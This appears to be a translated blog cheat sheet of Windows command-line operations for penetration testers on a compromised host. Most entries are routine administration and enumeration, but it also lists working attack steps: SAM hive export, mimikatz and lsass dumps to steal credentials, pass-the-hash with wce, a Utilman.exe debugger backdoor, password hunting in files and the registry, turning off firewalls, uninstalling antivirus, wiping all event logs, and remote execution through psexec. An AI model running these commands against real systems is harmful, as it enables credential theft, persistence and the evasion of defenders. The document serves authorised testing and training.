In a Windows operating system seized during penetration tests, some operations need to be done via the command line. We will examine the basic commands that can be run on the Windows operating system in penetration tests.

User and Group Operations

We will explain the user and group operations step by step below.

User Actions on the Local Computer

You can use the following commands for user actions on the local computer.

• whoami
• echo %username%
• echo %computername%%username%
• whoami /priv
• net user omer /Active:Yes
• net user omer 123qqqQ
• net user omer /del
• whoami /all
• net user
• net user omer
• net user omer 123qqqQ /add

Group Operations on the Local Computer

You can use the following commands for group operations on the local computer.

• net localgroup
• net localgroup “Remote Desktop Users”
• net localgroup Administrators omer /add
• net localgroup “Backup Operators” omer /del
• net localgroup “System Administrators” /add
• net localgroup “System Administrators” /del

User Actions in the Domain

You can use the following commands for user actions in the domain.

• net user /domain
• net user omer.sivka /domain
• net user omer.sivka /Active: Yes /domain
• net user omer.sivka 123qqqQ /domain
• net user omer.sivka /del /domain
• net user ismail.sivka 123qqqQ /add /domain
• wmic useraccount where name = ‘omer’ list full /format: list

Critical group (AdminSDHolder) Operations in the Domain

You can use the following commands for critical group (AdminSDHolder) operations in the domain.

• Get-ADUser -LDAPFilter “(objectcategory=person)(samaccountname=*)(admincount=1)”
• Get-ADGroup -LDAPFilter “(objectcategory=group) (admincount=1)”
• ([adsisearcher]”(AdminCount=1)”).findall()

Group Operations in the Domain

You can use the following commands for group actions in the domain.

• net group /domain
• dsquery group -limit 0 | dsget group -members –expand
• net group “Help Desk” /add /domain
• net group “Help Desk” /del /domain
• wmic group get Description, Domain, Name, SIDType
• net group “Domain Computers” /domain
• net group “Domain Admins” omer.sivka /add /domain
• net group “Domain Users” asaf.sivka /del /domain
• for /f “delims=” %X in (DomainAdminsGroup Members_List.txt) do net user %X /domain >> DomainAdminsGroupMembersCountry Information.txt

Computer Operations

We will explain the computer operations step by step below.

Current System Information

You can use the following commands for current system information.

• systeminfo
• Get-ChildItem Env: | ft Key,Value
• echo %LOGONSERVER%
• net view
• net config WORKSTATION
• getmac
• systeminfo | findstr “Domain:”
• fsutil fsinfo drives
• wmic computersystem get AdminPasswordStatus, AutomaticResetBootOption, DomainRole, Domain, Model, PartOfDomain, Roles, SystemType, UserName

Account Policy Actions

You can use the following commands for account policy actions.

• net accounts
• net accounts /MAXPWAGE:3

Audit Policy Actions

You can use the following commands for audit policy actions.

• auditpol /get /category:*
• auditpol /set /subcategory:”IPsec Driver” /success:enable /failure:disable

Start Directories

You can use the following commands for startup directories.

• Windows 6.0 ve 6.1
  • For all users: %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
  • For specific users: %SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
• Windows NT 5.0, 5.1 ve 5.2
  • %SystemDrive%\Documents and Settings\ All Users\ Start Menu\Programs\Startup

Sharing Operations

You can use the following commands for sharing operations.

• net share
• net share NewSharing = C:Userstrial /GRANT:Everyone,Full

Process Operations

You can use the following commands for process operations.

• tasklist /v
• tasklist /SVC | findstr /I “explorer.exe”
• Get-Process | where {$_.ProcessName -notlike “svchost*”} | FT Path,Company,Description,ProcessName,SessionId,MainWindowTitle
• tasklist /fi “pid eq 460”
• wmic process get Description, ExecutablePath, ParentProcessId, ProcessID, CommandLine
• qprocess explorer.exe
• qprocess omer.sivka
• taskkill /F /T /IM filezillaftp.exe
• taskkill /PID 1862 /F
• wmic process call create calc
• wmic process where name=”calc.exe” call terminate

Record Value Operations

You can use the following commands for Record Value Operations.

• reg query HKLM\System\CurrentControlSet\Control\Lsa /v crashonauditfail
• reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v PortNumber /t REG_DWORD /d 12345 /f
• reg save HKLM\SAM C:\SAMFile
• reg query “HKCU\Software\SimonTatham\PuTTY\Sessions\Registered SessionNamePutty” /v Hostname
• reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f
• reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe” /v Debugger /t REG_SZ /d “C:\Windows\System32\cmd.exe” /f
• reg export “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” result.reg
• reg import result.reg

Session Information

You can use the following commands for session information.

• query session
• qwinsta
• psloggedon -l Omer
• wmic netlogin get BadPasswordCount, FullName, LastLogon, Name, NumberOfLogons, PasswordAge, PasswordExpires, Privileges, UserType
• reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr Default
• Get-ItemProperty -Path ‘Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon’ | select “Default*”
• cmdkey /list

SAM and SYSTEM files

You can use the following commands for SAM and SYSTEM files.

• %SYSTEMROOT%\repair\SAM
• %SYSTEMROOT%\System32\config\RegBack\SAM
• %SYSTEMROOT%\System32\config\SAM
• %SYSTEMROOT%\repair\system
• %SYSTEMROOT%\System32\config\SYSTEM
• %SYSTEMROOT%\System32\config\RegBack\system

Routing Operations

You can use the following commands for forwarding operations.

• netstat -r
• route print -4
• route add 192.168.254.0 MASK 255.255.255.0 192.168.254.1
• route del 192.168.254.0

Wireless Networking

You can use the following commands for wireless network operations.

• netsh wlan show profiles
• netsh wlan show profile name=ModemSSID
• netsh wlan show profile name=ModemSSID key=clear | findstr “Key Content”
• FileDirectory: C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\XXX

Network Operations

You can use the following commands for network operations.

• ipconfig /all
• arp -a
• nslookup www.hotmail.com 8.8.8.8
• tftp -I 192.168.64.26 GET Application.exe
• netsh interface ipv4 set address name=”Local Area Connection” source=static address=192.168.254.10 mask=255.255.255.0 gateway=192.168.254.1
• netsh interface ipv4 add dnsservers “Local Area Connection” 192.168.254.10
• netsh interface portproxy add v4tov4 listenport=3000 listenaddress=5.5.5.5 connectport=4000 connectaddress=2.2.2.2
• type C:\Windows\System32\Drivers\etc\hosts
• wmic nic get AdapterType, Description, DeviceId, MACAddress, Name, ServiceName

Network Movements

You can use the following commands for network transactions.

• netstat -ano
• netstat -ano -p TCP | findstr 3389 | findstr /v 0.0.0.0:3389
• netstat -abf

DNS Information

You can use the following commands for DNS information.

• ipconfig /displaydns
• ipconfig /flushdns

Disc Information

You can use the following commands for disk information.

• wmic logicaldisk get Caption,FreeSpace,Size,VolumeName
• Get-PSDrive | Where {$_.Provider -like “Microsoft.PowerShell.Core\FileSystem”} | FT Root,Description,Used,Free

File and folder operations

You can use the following commands for file and folder operations.

• wmic LOGICALDISK get Caption, DeviceID, FileSystem, Name
• dir /a C:\Users\omer\Downloads\*.pdf
• tree /f /a
• dir /s /b | findstr xlsx
• dir /b /ad “C:\Users\”
• forfiles /P d: /D -30 /S /M *.exe /C “cmd /c echo @path @ext @fname @fdate”
• reg query HKCU /f password /t REG_SZ /s
• reg query HKLM /f password /t REG_SZ /s
• dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
• Get-ChildItem C:\Users -Force | Select FullName, LastAccessTime
• findstr /si “parola sifre password root admin”
• icalcs C:\Users\omer\Desktop\Criticalfile  –> icalcs: Sysinternals tool

Service configuration files

You can use the following commands for service configuration files.

• dir /a C:\inetpub\
• dir /s web.config
• dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
• dir /s *pass* == *vnc* == *.config* 2>nul
• findstr /si password *.xml *.ini *.txt *.config 2>nul

File Permissions

You can use the following commands for File Permissions.

• icacls “C:\Program Files\*” 2>nul | findstr “(F)” | findstr “Everyone”
• icacls “C:\Program Files\*” 2>nul | findstr “(M)” | findstr “BUILTIN\Users”
• Get-ChildItem ‘C:\Program Files\*’,’C:\Program Files (x86)\*’ | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match ‘Everyone’} } catch {}}
• accesschk.exe -qwsu “Everyone” *
• accesschk.exe -qwsu “Authenticated Users” *
• accesschk.exe -qwsu “Users” *

Scheduled Tasks

You can use the following commands for scheduled tasks.

• schtasks /query /fo LIST /v | findstr “Folder: HostName: Author: Run: TaskName: Comment:”
• schtasks /Create /SC Daily /TN DailyUserList /TR “C:\Windows\System32\net.exe user”
• at /interactive 15:00 cmd.exe
• net time
• Get-ScheduledTask | where {$_.TaskPath -notlike “\Microsoft*”} | ft TaskName,TaskPath,State

Service Operations

You can use the following commands for service operations.

• sc query state= all
• Get-Service
• sc queryex (Includes PID value)
• sc qc TermService
• netsh firewall set logging droppedpackets = enable
• netsh firewall set logging connections = enable
• The directory where the logs are saved: %systemroot%System32LogFilesFirewallpfirewall.log
• accesschk -cqwvu TrustedInstaller –> accesschk: Sysinternals tool
• wmic service get name, displayname, started, state, AcceptPause, AcceptStop | findstr /C:Term
• wmic service get name,displayname,pathname,startmode 2>nul |findstr /i “Auto” 2>nul |findstr /i /v “C:\Windows\\” 2>nul |findstr /i /v “”” > UnquotedServices
• net stop PolicyAgent
• net start termservice start= auto
• sc config PlugPlay start= disabled
• reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s > SNMPServiceSetting
• sc create ServisAdi binpath=C:\Users\ApplicationFile.exe start= auto

Note: If services that cannot be turned off such as Power, PlugPlay are disabled and the machine is restarted, this service will not work.

Firewall Operations

You can use the following commands for firewall operations.

• netsh firewall set service remotedesktop enable
• netsh firewall show opmode
• netsh firewall add portopening TCP 1234 “Open the Port of 1234” Enable All
• netsh firewall show portopening
• netsh firewall set logging droppedpackets = enable
• netsh firewall set logging connections = enable
• The directory where the logs are saved: %systemroot%System32LogFilesFirewallpfirewall.log
• netsh advfirewall show allprofiles
• netsh advfirewall set allprofiles state off
• netsh advfirewall set currentprofile state off

Programs and Features

You can use the following commands for programs and features.

• dir /a “C:\Program Files”
• dir /a “C:\Program Files (x86)”
• wmic product where name=”Kaspersky Internet Security” call uninstall /nointeractive
• Dism.exe /online /Get-Features /Format:Table
• Dism.exe /online /Enable-Feature /Featurename:TFTP
• pkgmgr /iu:”TelnetClient”
• reg query HKEY_LOCAL_MACHINE\SOFTWARE
• Get-ChildItem ‘C:\Program Files’, ‘C:\Program Files (x86)’ | ft Parent,Name,LastWriteTime
• Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
• wmic product get name

Starter Programs

You can use the following commands for startup programs.

• wmic startup get name, user, location
• reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
• dir “C:\Documents and Settings\%username%\Start Menu\Programs\Startup”
• Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
• Get-ItemProperty -Path ‘Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run’
• Get-ChildItem “C:\Users\All Users\Start Menu\Programs\Startup”
• reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
• reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
• reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
• dir “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”

Update – Patch Operations

You can use the following commands for Update-Patch operations.

• wusa /uninstall /kb:2744842 /quiet /norestart
• wmic qfe where HotFixID=”KB3011780″ get Caption, HotFixID
• Get-WmiObject -Class “win32_quickfixengineering” | Select-Object -Property “Description”, “HotfixID”, @{Name=”InstalledOn”; Expression={([DateTime]($_.InstalledOn)).ToLocalTime()}}
• wmic qfe list full /format:htable > Result.html
• dism /online /get-packages

Locking Session

You can use the following commands to lock the session.

• rundll32.exe user32.dll, LockWorkStation

Copy Files

You can use the following commands to copy files.

• copy D:\netcat.exe C:\Users

Getting passwords from RAM

You can use the following commands to obtain passwords from RAM.

• mimikatz > privilege::debug > sekurlsa::logonPasswords
• mimikatz “sekurlsa::logonPasswords full” exit
• procdump -accepteula -ma lsass.exe lsass.dmp
  • mimikatz > sekurlsa::minidump lsass.dmp > sekurlsa::logonPasswords
• wce -w
• wce -s WORKGROUP:Administrator:<LM>:<NTLM>

Log operations

You can use the following commands for logging.

• wevtutil qe Application /c:10 /rd:true /f:text
• for /F “tokens=*” %G in (‘wevtutil.exe el’) DO (wevtutil.exe cl “%G”)

Run Commands Like any Other User

You can use the commands below to run a command like any other user.

• runas /env /user:COMPANY\Omer.Sivka cmd
• psexec -s cmd.exe

Group Policy Actions

You can use the following commands for group policy actions.

• gpupdate /force
• gpresult /z
• gpresult /H Policy.html
• gpresult /USER omer.sivka /SCOPE COMPUTER /Z

E-mail Transactions

You can use the following commands for e-mail transactions.

• dsquery user -name “user name”|dsget user -samid -email -display
• Get-Mailbox | fl name, emailaddresses
• Get-QADUser -SizeLimit 0 -Enabled -Email * | Select-Object DisplayName,Email

Domain Trust Relationships

You can use the following commands for domain trust relationships.

• nltest /domain_trusts –> Lists all trust relationships
• nltest /trusted_domains–> Lists all trust relationships
• nltest /dcname:Company –> Returns the server with the PDC role in a given domain.
• nltest /dclist:Company –> Fetches servers with DC role in a given domain.
• nltest /server:DC /trusted_domains
• ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains –> All domains in the forest are listed.
• netdom query /domain Company.local TRUST –>  Lists all trust relationships. Different data can also be listed with FSMO, DC, PDC, OU, WORKSTATION instead of TRUST.

Information of the Logged in Domain Account

You can use the following commands for the logged on domain account information.

• Get-EventLog security 4624 -newest 10000 | Where-Object{$_.Message -like ‘*Omer.Sivka*’}| format-list Message > LoginInformationOmerSivkaAccount.txt

Note: The specified command must be run on the domain controller (DC).

Remote Computer Operations

Below we will describe remote computer operations step by step.

System information for the remote computer

You can use the following commands to get system information for the remote computer.

• psinfo \\172.16.4.230 -h -s -d
• systeminfo /S 10.35.2.52 /U Sample\Omer /P 123qqqQ

Access to the Remote Computer’s Command line

You can use the following commands to access the remote computer’s command line.

• psexec \\192.168.254.10 -u COMPANYomer.sivka -p 123qqqQ cmd.exe /accepteula
• psexec \\192.168.254.10 -u COMPANYomer.sivka -p 123qqqQ -c -f  \\192.168.254.33\Sharing\Application.exe

Processes running on the remote computer

You can use the following commands for processes running on the remote computer.

• tasklist /V /S 192.168.254.33 /U COMPANYomer.sivka /P Fenerbahce

Record values on the remote computer

You can use the following commands for registry values on the remote computer.

• reg query “\\192.168.254.33\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Userinit

Access to the share of the remote computer

You can use the following commands to access the share of the remote computer.

• net use K: \\192.168.254.10\C$ /USER:COMPANY\omer.sivka 123qqqQ
• net use K: /delete

Sessions open on the remote computer

You can use the following commands for sessions open on the remote computer.

• query session /server:DCserver
• reset session 3 /server:DCserver

Scheduled tasks on the remote computer

You can use the following commands for scheduled tasks on the remote computer.

• net time \\192.168.254.33
• at \\192.168.254.33 11:22 Script.bat

Copying the directory on the remote computer

You can use the following commands to copy the directory on the remote computer.

• xcopy /s 192.168.254.33\SharingFolder C:\CopyDirectory

References:

• http://technet.microsoft.com/en-us/library/cc722416(v=ws.10).aspx
• http://www.robvanderwoude.com/ntadmincommands.php
• http://ckerekes.com/dsquery.shtml
• http://www.networkpentest.net/p/windows-command-list.html